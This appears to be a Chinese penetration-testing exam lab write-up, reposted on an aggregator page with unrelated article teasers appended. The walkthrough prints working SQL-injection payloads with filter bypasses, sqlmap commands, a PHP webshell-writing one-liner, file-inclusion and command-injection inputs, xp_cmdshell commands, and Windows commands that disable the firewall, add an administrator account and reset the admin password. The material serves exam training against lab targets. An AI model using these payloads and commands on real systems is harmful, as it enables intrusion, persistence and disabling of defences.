PTE-靶场训练-1

PTE-靶场训练实战笔记

靶场搭建

靶场下载链接:

https://pan.baidu.com/s/1ce1Kk0hSYlxrUoRTnNsiKA?pwd=ha1x

 vim /etc/sysconfig/network-scripts/ifcfg-eth0

设置好后reboot重启一下即可,然后访问81-85端口,共5题。

因为靶场出了问题,只能打开第一题,建议按照原网络环境去设置仅主机模式,原IP地址是172.16.12.100,虚拟机中的攻击机也可以配置同网段仅主机模式即可,问题不大。

pet-2003设置net模式就好了,发现用桥接模式扫描端口失败

基础题目之SQL注入

通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中

手工注入的话有点麻烦,它过滤了union,可以使用双写绕过,ununionion,空格可以用%0a(回车符)绕过,#号可以用编码%23进行绕过。

首先判断字段数

 http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)%0aorder%0aby%0a5%23

order by到5就显示不正常,那么字段数就是4

然后就使用联合查询去注入

http://172.16.12.100:81/vulnerabilities/fu1.php?id=-1%27)%0aununionion%0aselect%0a1,load_file(%27/tmp/360/key%27),3,4%23

 也可以使用sqlmap完成本题,因为有简单的过滤,可以使用自带的绕过脚本space2comment

sqlmap.py -u http://192.168.136.155:81/vulnerabilities/fu1.php?id=1 --level 5 --risk 3 --tamper=space2comment

ok了,得出存在布尔型注入以及延时注入

因为本题的flag在/tmp/360/key文件,那么我们直接进入到sql-shell,用查询语句获得flag

sqlmap.py -u http://192.168.136.155:81/vulnerabilities/fu1.php?id=1 --level 5 --risk 3 --tamper=space2comment --sql-shell

 进入sql-shell以后,我们用load_file语句去读取文件

select load_file('/tmp/360/key');

得出key:8b3h4a7v

基础题目之文件上传突破

文件上传突破,需要绕过WAF过滤

上传一句话木马没反应,上传普通的图片是有显示上传成功

制作图片马:

copy /b tupian.jpg+shell.php 1ndex.jpg

 上传后抓包改成php,没反应,应该是waf拦截

这时候绕过waf,可以改成php2,php3,php4等,发现2和4都能成功上传,当然蚁剑只有4的,那就用4连接

蚁剑测试连接成功

在html目录发现key

key2:8t5s0x5t

基础题目之文件包含

通过你所学到的知识,测试该网站可能存在的包含漏洞,尝试获取webshell,答案就在根目录下key.php文件中。

http://172.16.12.100:83/vulnerabilities/fu1.php?file=../../etc/passwd

说明是存在文件包含漏洞的。那么我们可以测试一下存不存在远程文件包含和本地文件包含

首先测试php://input,看可不可以用伪协议,有输出就说明可以用

 然后试试远程文件包含第二题的一句话木马(去掉图片内容),好像不行

那么就剩下本地文件包含了,可以用伪协议写入

<?php fputs(fopen('a.php', 'w'),'<?php eval($_POST[anhunsec]); ?>'); ?>

 

连接成功

php://filter伪协议

?file=php://filter/convert.base64-encode/resource=../key.php

key:6u3x9t2p

基础题目之命令执行

通过你所学到的知识,通过执行Linux命令获取webshell,答案就在根目录下key.php文件中。

输入ip,他就可以执行ping命令

127.0.0.1 | id

 

127.0.0.1 | cat key.php

包含敏感字符,过滤了cat,

其实应该先找key文件在哪里,它过滤了ls,那么只能盲测,less是没有被过滤的,那么直接less key.php,看能不能显示出内容。

127.0.0.1 | less key.php

很显然,没有反应。

那么就切换到上一级目录

127.0.0.1 | less ../key.php

 

他有显示GET it,说明key文件是在上一级目录,那么怎么获取他的key呢?其实可以使用grep去查找带有key字样的内容

127.0.0.1 | grep 'key' ../key.php 

key:3s9j6c2k

基础题目之日志分析

最近管理员很苦恼,发现自己的服务器被人入侵了,但是不知道原因,你能帮帮他吗?

管理员把日志保存下来了,大概分析了一下,有两个IP对服务器进行了攻击, 感觉攻击者的IP是 172.16.12.12 。

日志下载地址:当前目录下的 access.log

本题可以借助应急响应工具中的星图工具去分析。

当然考试当中可能没有日志分析工具,那么就只能一个个看啦!

 那么题目提示说攻击者的IP是 172.16.12.12,那么就只要找这个IP的信息,当然攻击分析好像没发现什么,那么去看常规日志分析

发现访问比较多的是/adminlogin.php,那么我去访问一下

发现一个登陆页面,那么直接爆破就可以啦,注意,一般考试不会让你爆破很久,选字典的时候选少一点

根据返回的长度值,和其他不一样就说明密码是正确,并且返回的状态码是302跳转。那么账号密码就是admin | password123

key:9y6u8s5m

综合题-2003

已知IP地址是:192.168.1.119,端口范围在27000-28000

首先namp扫描端口

nmap -sS -T4 -p 27000-28000 192.168.136.136

扫描到27689端口开放,访问后是一个文件上传下载系统

还不知道账号密码,先扫描一波目录,当然最好使用多个工具互补扫描

发现存在robots.txt以及一个配置备份文件

有数据库的账号密码,直接用navcat去连接,是sql server的数据库

得到登陆账号和密码admin |asdadwn_d2112

key1

登陆后得到key1:4k3s9m3d

上传aspx马

然后进入文件上传功能,上传aspx的马。先正常上传shell.aspx,提示该文件不允许上传,文件名先改成.jpg格式上传

aspx木马可以用网站上的bbbbbbbb.aspx文件。

发现上传成功

点击管理上传文件,发现文件名jp后面去掉了g

经过多次测试,文件名达到8位字符时,就可以省略后面的jpg,因为页面中说了文件名过长会被系统截取包括系统时间在内的前32位字符作为文件名,请上传的文件名称不要过长.时间是18个字符,杠一个字符,.aspx5个字符,总共24字符,32-24=8,说明文件名要8位字符,才能把.jpg后面都被系统截断

随后就是找文件路径了,点击最下面上传的文件

发现它的上传路径是upfile/affix/

然后拼接一下webshell路径

http://192.168.136.136:27689/upfile/affix/638123235837656250-shelllll.aspx

 

key2

web根目录获得key2:2a3s9p4d

接下来就是进入系统桌面,但是发现权限不够

在web目录中,看到了web.config.back-2017-12-12文件,点开来刚好是sa权限的用户

key3

那么继续使用navcat去连接

连接后使用sql-server查询语句去查询系统文件

先看看桌面里有什么文件

exec xp_cmdshell 'dir "C:\Documents and Settings\Administrator\桌面"'

 

发现有个key,txt,接下来就读取一下就行了

exec xp_cmdshell 'type "C:\Documents and Settings\Administrator\桌面\key.txt"'

 

后面发现,在数据库中直接点击也可以发现key3值。

key3:4d9d3q8v

或者在蚁剑上关闭靶机防火墙,重置管理员密码,上传3389开启脚本,执行3389开启脚本,连接远程登录,进入靶机去桌面、垃圾桶里找key文件。

# win2003关闭防火墙命令
netsh firewall set opmode mode=disablenet user admin admin /add
net localgroup administrators admin /addnet user administrator 123456

 

综合题-2008

靶场:Windows Server 2008 R2 x64

修改靶场机IP:

IP为:192.168.209.139

认证爆破密码

看到phpstudy开启,浏览器访问上面IP,发现有访问认证:

尝试BP抓包,爆破:

发现Authorization认证,是base64加密,解密查看是:admin:admin

对密码进行爆破:

选择第四个工具方式,添加第一个变量:(admin:)、第二个变量(admin),Payloads:

Authorization: Basic YWRtaW46MTIzNDU2

解码是:(admin:123456)

key1

得到key值:

因为有认证,别的目录扫描工具已经不行了,要用BP抓取带有认证的数据包进行目录爆破:

发现字典路径有中文会报错,需要复制到英文路径下:

知道数据库后台登录页面,phpMyAdmin (root/root)

在dedecmsv56utf数据库中找到:dede\_admin

搜索知道dede的密码需要进行MD5编码,然后删除前五位和后七位的字母,字母小写:

修改好密码,登录前面的DEDECMS

(前面爆破出来的301状态码url:http://192.168.209.139/dede):

在模块->标签里找到php文件,写入一句话木马:

蚁剑添加认证信息

用蚁剑连的时候要注意,除了基础操作外,还需要添加认证信息:

连接成功:

key2

看到key2值:

关闭防火墙

输入命令,关闭靶机防火墙:

netsh firewall set opmode disable

添加用户和组

添加用户和组、以及修改管理员密码:

net user admin admin /add
net localgroup administrators admin /addnet user administrator 123456

 

上传开启3389脚本:

运行:

连接远程桌面: 

key3

在垃圾桶中找到key3值,完成主机渗透。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/35330.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

C++ Primer 中文版 第5版 读书笔记

读书过程中发现&#xff0c;读得越多&#xff0c;忘得越多。因此记录读书笔记 1.2 初始输入输出 向流写入数据 <<运算符&#xff08;输出运算符&#xff09;接受两个运算对象&#xff1a;左侧的运算对象必须是一个ostream对象&#xff0c;右侧的运算对象是要打印的值。…

Spark SQL----连接其他数据库的JDBC

Spark SQL----连接其他数据库的JDBC 数据源选项 Spark SQL还包括一个数据源&#xff0c;可以使用JDBC从其他数据库读取数据。与使用 JdbcRDD相比&#xff0c;应该优先使用此功能。这是因为结果以DataFrame的形式返回&#xff0c;并且可以很容易地在Spark SQL中进行处理或与其他…

React 中 useState 和 useReducer 的联系和区别

文章目录 使用场景使用 useState使用 useReducer 联系区别用法状态更新逻辑适用场景可读性和可维护性 使用场景 使用 useState 状态逻辑简单。只涉及少量的状态更新。需要快速和简单的状态管理。 使用 useReducer 状态逻辑复杂。涉及多个子状态或多种状态更新逻辑。需要更好…

Vatee万腾平台:一站式智慧服务,让生活更美好

在数字化浪潮席卷全球的今天&#xff0c;我们生活的方方面面都在经历着前所未有的变革。Vatee万腾平台凭借其一站式智慧服务&#xff0c;正成为推动这场变革的重要力量&#xff0c;让我们的生活变得更加美好。 Vatee万腾平台&#xff0c;作为一家专注于提供智慧服务的领军企业&…

【运维】如何分析和清理 Linux 根目录的磁盘空间使用情况

要分析根目录(/)使用了这么多空间&#xff0c;您可以使用以下几种方法来找出具体的占用情况&#xff1a; 1. 使用 du 命令 du 命令可以显示目录或文件的磁盘使用情况。 运行以下命令来找出根目录下的哪些目录占用了大量空间&#xff1a; sudo du -h --max-depth1 / | sort …

基于weixin小程序校园快递系统的设计

管理员账户功能包括&#xff1a;系统首页&#xff0c;个人中心&#xff0c;管理员管理&#xff0c;用户管理&#xff0c;订单管理&#xff0c;快递管理&#xff0c;快递记录管理&#xff0c;公告管理&#xff0c;基础数据管理 小程序功能包括&#xff1a;系统首页&#xff0c;…

企业有必要安装数据文件加密软件吗?哇!这么多好处

需要的 一、查看以下分析&#xff0c;便能得出结论 安全防护提升&#xff1a;禁止拷贝、打印、截屏等&#xff0c;还能够设置文件的浏览次数、有效期&#xff0c;提供多层次的文档保护措施。 核心机密保护&#xff1a;企业的核心机密文件、技术资料、客户资料等重要信息是公…

MySQL——Update语句详解

update 修改谁 &#xff08;条件&#xff09; set 原来的值 新值 -- 修改学员的名字(指定条件&#xff0c;只改一列) UPDATE student SET name 辰阳 WHERE id 1; -- 修改学员的名字(不指定条件&#xff0c;全改) UPDATE student SET name 宝宝-- 语法&#xff1a; -- U…

【MySQL备份】mysqldump篇

目录 1.简介 2.基本用途 3.命令格式 3.1常用选项 3.2常用命令 4.备份脚本 5.定时执行备份脚本 1.简介 mysqldump 是 MySQL 数据库管理系统的命令行实用程序&#xff0c;用于创建数据库的逻辑备份。它能够导出数据库的结构&#xff08;如表结构、视图、触发器等&#xf…

reactjs18 中使用@reduxjs/toolkit同步异步数据的使用

react18 中使用@reduxjs/toolkit 1.安装依赖包 yarn add @reduxjs/toolkit react-redux2.创建 store 根目录下面创建 store 文件夹,然后创建 index.js 文件。 import {configureStore } from "@reduxjs/toolkit"; import {counterReducer } from "./feature…

Does a vector database maintain pre-vector chunked data for RAG systems?

题意&#xff1a;一个向量数据库是否为RAG系统维护预向量化分块数据&#xff1f; 问题背景&#xff1a; I believe that when using an LLM with a Retrieval-Augmented Generation (RAG) approach, the results retrieved from a vector search must ultimately be presented…

WIFI各版本的带宽

带宽的定义&#xff1a; 带宽在网络领域通常指信道带宽&#xff0c;即信号在频谱中占用的频宽&#xff0c;单位是MHz&#xff08;兆赫&#xff09;。在无线通信中&#xff0c;带宽越宽&#xff0c;能够传输的数据量越大&#xff0c;因此信道带宽直接影响着数据传输速率。WiFi标…

FairGuard游戏加固无缝兼容 Android 15 预览版

2024年6月25日&#xff0c;谷歌发布了 Android 15 Beta 3 &#xff0c;作为Android 15 “平台稳定性”的里程碑版本&#xff0c;谷歌建议所有应用、游戏、SDK、库和游戏引擎开发者都将“平台稳定性”里程碑版本作为规划最终兼容性测试和公开发布的目标。 安卓开发者博客提供的版…

【2024-热-办公软件】ONLYOFFICE8.1版本桌面编辑器测评

在今日快速发展的数字化办公环境中&#xff0c;选择一个功能全面且高效的办公软件是至关重要的。最近&#xff0c;我有幸体验了ONLYOFFICE 8.1版本的桌面编辑器&#xff0c;这款软件不仅提供了强大的编辑功能&#xff0c;还拥有众多改进&#xff0c;让办公更加流畅和高效。在本…

货运大模型的未来:轻量化、场景化

“加快数字化和智能化转型发展&#xff0c;已成为物流行业的重要战略方向。”6月25日&#xff0c;在第十九届中国国际物流节暨第二十一届中国国际运输与物流博览会&2024亚洲物流双年展在上海开幕&#xff0c;中国交通运输协会会长、原铁道部副部长胡亚东在开幕致辞中表示。…

Python实践项目讲解:如何用制作一个桌面宠物

制作一个桌面宠物&#xff08;Desktop Pet&#xff09;在Python中通常涉及多个步骤&#xff0c;包括创建宠物的图形界面、添加动画效果、处理用户交互等。下面是一个简化的步骤指南&#xff0c;帮助你开始使用Python制作桌面宠物&#xff1a; 选择图形库&#xff1a; Tkinter&…

《我的第一本编程书》-Sunaba编程中的存储区与数字

第一个Sunaba的代码是 存储区[65049]→500000 其中存储区相当于在内存中申请了一个空间&#xff0c;这个空间用来存储数据 有点类似其他变量并赋值 存储区后面的数字是在sunaba界面存储的坐标&#xff0c;修改这个坐标&#xff0c;输出的位置不同。 →后面的数字是存储的数…

新能源行业必会基础知识-----电力市场概论笔记-----绪论

新能源行业知识体系-------主目录-----持续更新(进不去说明我没写完)&#xff1a;https://blog.csdn.net/grd_java/article/details/139946830 目录 1. 电力市场的定义2. 对传统电力系统理论的挑战 1. 电力市场的定义 1. 我国电力市场的进程 我国新一轮电力体制改革的5大亮点&…

量子信息基础知识与实践指南

量子信息是一门涉及量子力学和信息理论的交叉学科&#xff0c;它探讨如何利用量子力学的性质来传输、存储和处理信息。以下是关于量子信息的基础知识和实践指南&#xff1a; 量子信息的基础知识&#xff1a; 量子比特&#xff08;Qubit&#xff09;&#xff1a; 量子比特是量子…

【Echarts】散点图 制作 气泡 类型图表

目录 需求主要代码效果展示注 需求 需参照设计图画出对应图表 主要代码 /**** 数据 ****/ this.dataList [...Array(8).keys()].map((item) > {return {ywlxmc: 业务类型 (item 1),sl: item > 4 ? 50 : 70} })/**** 气泡样式 ****/ const styleList [{offset: [56…